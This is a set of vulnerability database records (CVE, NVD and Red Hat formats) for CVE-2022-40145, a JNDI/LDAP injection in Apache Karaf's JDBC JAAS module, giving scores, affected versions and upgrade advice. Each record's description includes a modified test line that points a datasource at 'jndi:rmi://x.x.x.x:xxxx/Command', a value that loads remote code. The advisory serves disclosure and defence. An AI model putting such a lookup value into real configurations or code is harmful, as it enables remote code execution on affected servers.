{"dataType": "CVE_RECORD", "dataVersion": "5.1", "cveMetadata": {"cveId": "CVE-2022-40145", "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "state": "PUBLISHED", "assignerShortName": "apache", "dateReserved": "2022-09-07T08:02:30.677Z", "datePublished": "2022-12-21T15:23:42.847Z", "dateUpdated": "2025-04-15T18:03:47.618Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Apache Karaf", "vendor": "Apache Software Foundation", "versions": [{"lessThan": "4.4.2", "status": "affected", "version": "4.4.0", "versionType": "maven"}, {"lessThan": "4.3.8", "status": "affected", "version": "0", "versionType": "maven"}]}], "credits": [{"lang": "en", "type": "reporter", "value": "Xun Bai <bbbbear68@gmail.com>"}], "descriptions": [{"lang": "en", "supportingMedia": [{"base64": false, "type": "text/html", "value": "<span style=\"background-color: rgb(255, 255, 255);\">This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.<br><br>The function jaas.modules.src.main.java.por</span><span style=\"background-color: rgb(255, 255, 255);\">g.apache.karaf.jass.modules.</span><span style=\"background-color: rgb(255, 255, 255);\">jdbc.JDBCUtils#doCreateDatasou</span><span style=\"background-color: rgb(255, 255, 255);\">rce</span><br><span style=\"background-color: rgb(255, 255, 255);\">use InitialContext.lookup(jndiName</span><span style=\"background-color: rgb(255, 255, 255);\">) without filtering.<br>An user can modify&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">`options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE, \"osgi:\" +&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">DataSource.class.getName());` to `options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE,</span><span style=\"background-color: rgb(255, 255, 255);\">\"jndi:rmi://x.x.x.x:xxxx/Comma</span><span style=\"background-color: rgb(255, 255, 255);\">nd\");` in JdbcLoginModuleTest#setup.</span><br><br><span style=\"background-color: rgb(255, 255, 255);\">This is vulnerable to a remote code execution (RCE) attack when a</span><br><span style=\"background-color: rgb(255, 255, 255);\">configuration uses a JNDI LDAP data source URI when an attacker has</span><br><span style=\"background-color: rgb(255, 255, 255);\">control of the target LDAP server.</span><p>This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.</p>We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}], "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}], "metrics": [{"other": {"content": {"text": "low"}, "type": "Textual description of severity"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-74", "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "lang": "en", "type": "CWE"}]}, {"descriptions": [{"cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache", "dateUpdated": "2022-12-21T15:23:42.847Z"}, "references": [{"tags": ["vendor-advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}], "source": {"defect": ["KARAF-7568"], "discovery": "EXTERNAL"}, "title": "Apache Karaf: JDBC JAAS LDAP injection", "x_generator": {"engine": "Vulnogram 0.1.0-dev"}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T12:14:39.957Z"}, "title": "CVE Program Container", "references": [{"tags": ["vendor-advisory", "x_transferred"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}]}, {"metrics": [{"cvssV3_1": {"scope": "UNCHANGED", "version": "3.1", "baseScore": 9.8, "attackVector": "NETWORK", "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "integrityImpact": "HIGH", "userInteraction": "NONE", "attackComplexity": "LOW", "availabilityImpact": "HIGH", "privilegesRequired": "NONE", "confidentialityImpact": "HIGH"}}, {"other": {"type": "ssvc", "content": {"timestamp": "2025-04-15T18:02:30.458673Z", "id": "CVE-2022-40145", "options": [{"Exploitation": "none"}, {"Automatable": "yes"}, {"Technical Impact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2025-04-15T18:03:47.618Z"}}]}}

{"dataType": "CVE_RECORD", "containers": {"adp": [{"title": "CVE Program Container", "references": [{"url": "https://karaf.apache.org/security/cve-2022-40145.txt", "tags": ["vendor-advisory", "x_transferred"]}], "providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T12:14:39.957Z"}}, {"title": "CISA ADP Vulnrichment", "metrics": [{"cvssV3_1": {"scope": "UNCHANGED", "version": "3.1", "baseScore": 9.8, "attackVector": "NETWORK", "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "integrityImpact": "HIGH", "userInteraction": "NONE", "attackComplexity": "LOW", "availabilityImpact": "HIGH", "privilegesRequired": "NONE", "confidentialityImpact": "HIGH"}}, {"other": {"type": "ssvc", "content": {"id": "CVE-2022-40145", "role": "CISA Coordinator", "options": [{"Exploitation": "none"}, {"Automatable": "yes"}, {"Technical Impact": "total"}], "version": "2.0.3", "timestamp": "2025-04-15T18:02:30.458673Z"}}}], "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2025-04-15T18:03:02.485Z"}}], "cna": {"title": "Apache Karaf: JDBC JAAS LDAP injection", "source": {"defect": ["KARAF-7568"], "discovery": "EXTERNAL"}, "credits": [{"lang": "en", "type": "reporter", "value": "Xun Bai <bbbbear68@gmail.com>"}], "metrics": [{"other": {"type": "Textual description of severity", "content": {"text": "low"}}}], "affected": [{"vendor": "Apache Software Foundation", "product": "Apache Karaf", "versions": [{"status": "affected", "version": "4.4.0", "lessThan": "4.4.2", "versionType": "maven"}, {"status": "affected", "version": "0", "lessThan": "4.3.8", "versionType": "maven"}], "defaultStatus": "unaffected"}], "references": [{"url": "https://karaf.apache.org/security/cve-2022-40145.txt", "tags": ["vendor-advisory"]}], "x_generator": {"engine": "Vulnogram 0.1.0-dev"}, "descriptions": [{"lang": "en", "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "supportingMedia": [{"type": "text/html", "value": "<span style=\"background-color: rgb(255, 255, 255);\">This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.<br><br>The function jaas.modules.src.main.java.por</span><span style=\"background-color: rgb(255, 255, 255);\">g.apache.karaf.jass.modules.</span><span style=\"background-color: rgb(255, 255, 255);\">jdbc.JDBCUtils#doCreateDatasou</span><span style=\"background-color: rgb(255, 255, 255);\">rce</span><br><span style=\"background-color: rgb(255, 255, 255);\">use InitialContext.lookup(jndiName</span><span style=\"background-color: rgb(255, 255, 255);\">) without filtering.<br>An user can modify&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">`options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE, \"osgi:\" +&nbsp;</span><span style=\"background-color: rgb(255, 255, 255);\">DataSource.class.getName());` to `options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE,</span><span style=\"background-color: rgb(255, 255, 255);\">\"jndi:rmi://x.x.x.x:xxxx/Comma</span><span style=\"background-color: rgb(255, 255, 255);\">nd\");` in JdbcLoginModuleTest#setup.</span><br><br><span style=\"background-color: rgb(255, 255, 255);\">This is vulnerable to a remote code execution (RCE) attack when a</span><br><span style=\"background-color: rgb(255, 255, 255);\">configuration uses a JNDI LDAP data source URI when an attacker has</span><br><span style=\"background-color: rgb(255, 255, 255);\">control of the target LDAP server.</span><p>This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.</p>We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "base64": false}]}], "problemTypes": [{"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-74", "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')"}]}, {"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation"}]}], "providerMetadata": {"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache", "dateUpdated": "2022-12-21T15:23:42.847Z"}}}, "cveMetadata": {"cveId": "CVE-2022-40145", "state": "PUBLISHED", "dateUpdated": "2025-04-15T18:03:47.618Z", "dateReserved": "2022-09-07T08:02:30.677Z", "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "datePublished": "2022-12-21T15:23:42.847Z", "assignerShortName": "apache"}, "dataVersion": "5.1"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*", "matchCriteriaId": "CEDC6799-2894-4DB9-A66B-9481580EDC66", "versionEndExcluding": "4.3.8", "vulnerable": true}, {"criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*", "matchCriteriaId": "3320F4C0-A9F6-43C3-B473-1E56EFD0086D", "versionEndExcluding": "4.4.2", "versionStartIncluding": "4.4.0", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}, {"lang": "es", "value": "Esta vulnerabilidad se trata de una posible inyecci\u00f3n de c\u00f3digo cuando un atacante tiene el control del servidor LDAP de destino utilizando la URL JDBC JNDI. La funci\u00f3n jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource utiliza InitialContext.lookup(jndiName) sin filtrar. Un usuario puede modificar `options.put(JDBCUtils.DATASOURCE, \"osgi:\" + DataSource.class.getName());` a `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://xxxx:xxxx/Command \");` en JdbcLoginModuleTest#setup. Esto es vulnerable a un ataque de ejecuci\u00f3n remota de c\u00f3digo (RCE) cuando una configuraci\u00f3n utiliza un URI de origen de datos LDAP JNDI cuando un atacante tiene control del servidor LDAP de destino. Este problema afecta a todas las versiones de Apache Karaf hasta 4.4.1 y 4.3.7. Animamos a los usuarios a actualizar a Apache Karaf al menos 4.4.2 o 4.3.8."}], "id": "CVE-2022-40145", "lastModified": "2025-04-15T18:15:44.667", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}, {"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary"}]}, "published": "2022-12-21T16:15:08.930", "references": [{"source": "security@apache.org", "tags": ["Vendor Advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}], "sourceIdentifier": "security@apache.org", "vulnStatus": "Modified", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-74"}], "source": "security@apache.org", "type": "Secondary"}, {"description": [{"lang": "en", "value": "NVD-CWE-Other"}], "source": "nvd@nist.gov", "type": "Primary"}]}

{"bugzilla": {"description": "karaf: JDBC JAAS LDAP injection", "id": "2257304", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257304"}, "csaw": false, "cvss3": {"cvss3_base_score": "9.8", "cvss3_scoring_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "status": "draft"}, "cwe": "CWE-20", "details": ["This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "A flaw was found in Apache Karaf. This issue may allow an attacker to control the LDAP server used by the JDBC JNDI URL and execute code remotely (RCE)."], "mitigation": {"lang": "en:us", "value": "No mitigation is currently available."}, "name": "CVE-2022-40145", "package_state": [{"cpe": "cpe:/a:redhat:jboss_enterprise_brms_platform:7", "fix_state": "Not affected", "package_name": "Karaf", "product_name": "Red Hat Decision Manager 7"}, {"cpe": "cpe:/a:redhat:jboss_fuse:7", "fix_state": "Not affected", "package_name": "Karaf", "product_name": "Red Hat Fuse 7"}, {"cpe": "cpe:/a:redhat:jboss_amq:6", "fix_state": "Out of support scope", "package_name": "karaf", "product_name": "Red Hat JBoss A-MQ 6"}, {"cpe": "cpe:/a:redhat:jboss_data_grid:7", "fix_state": "Out of support scope", "package_name": "karaf", "product_name": "Red Hat JBoss Data Grid 7"}, {"cpe": "cpe:/a:redhat:jboss_fuse:6", "fix_state": "Out of support scope", "package_name": "Karaf", "product_name": "Red Hat JBoss Fuse 6"}, {"cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7", "fix_state": "Not affected", "package_name": "karaf", "product_name": "Red Hat Process Automation 7"}], "public_date": "2022-12-21T00:00:00Z", "references": ["https://www.cve.org/CVERecord?id=CVE-2022-40145\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-40145\nhttps://karaf.apache.org/security/cve-2022-40145.txt"], "statement": "This attack requires previous control of the LDAP target server in order to obtain access and perform code execution. Considering the pre-requisites for this vulnerability to be exploited, the impact is Important and not Critical.", "threat_severity": "Important"}

{}